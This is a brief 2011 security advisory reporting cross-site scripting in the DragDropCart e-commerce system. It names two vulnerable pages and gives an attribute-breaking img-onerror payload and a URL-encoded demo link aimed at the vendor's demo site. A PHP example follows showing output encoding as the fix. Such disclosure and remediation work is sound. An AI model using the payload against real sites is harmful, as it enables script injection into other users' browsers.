DragDropCart suffers from a cross site scripting vulnerability.
# Exploit Title: DragDropCart (E-Commerce System) Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All versions
# Tested on: All versions are vulnerable
ISSUE
Cross-site scripting is possible through user-supplied input.
Vulnerable Pages:
search.php
yaxal_user.php
Example:
search.php?search=<XSS Code>
Exploit:
"/></A></><img src=1.gif onerror=alert(1)>
Demo:
http://www.dragdropcart.com/demo/search.php?search=%22/%3E%3C/A%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert%281%29%3E
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
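
The fix for this class of bug is context-aware output encoding wherever the search term is written back into the page. The following is an added example, not DragDropCart source code and not part of the original advisory: the render functions are hypothetical, and it assumes the term is echoed into an attribute value and into page text, which the leading `"/>` of the payload suggests but the advisory does not state.

```php
<?php
// Added illustration: hypothetical handler, not DragDropCart source code.
// Assumption: the search term is echoed into an attribute value and into page text.

// The payload quoted in the advisory, used here as constructed test input.
$payload = '"/></A></><img src=1.gif onerror=alert(1)>';

// Unsafe pattern: raw request data concatenated into markup.
function render_unsafe(string $term): string
{
    return '<input type="text" name="search" value="' . $term . '">'
         . '<p>Results for: ' . $term . '</p>';
}

// Hardened pattern: encode for the HTML context at the point of output.
// ENT_QUOTES encodes both " and ', so the value cannot close the attribute;
// < and > are encoded too, so no new element can be opened.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $term): string
{
    return '<input type="text" name="search" value="' . h($term) . '">'
         . '<p>Results for: ' . h($term) . '</p>';
}

// True when the output contains a live <img> tag, i.e. the input
// escaped its intended context and became markup.
function has_injected_tag(string $html): bool
{
    return stripos($html, '<img') !== false;
}

$unsafe = render_unsafe($payload);
$safe   = render_safe($payload);

echo 'unsafe output injects markup: ' . var_export(has_injected_tag($unsafe), true) . PHP_EOL;
echo 'safe output injects markup:   ' . var_export(has_injected_tag($safe), true) . PHP_EOL;
echo $safe . PHP_EOL;
```

The same encoding applies when a stored value is read back and rendered, which is where the stored variant named in the title would be neutralized.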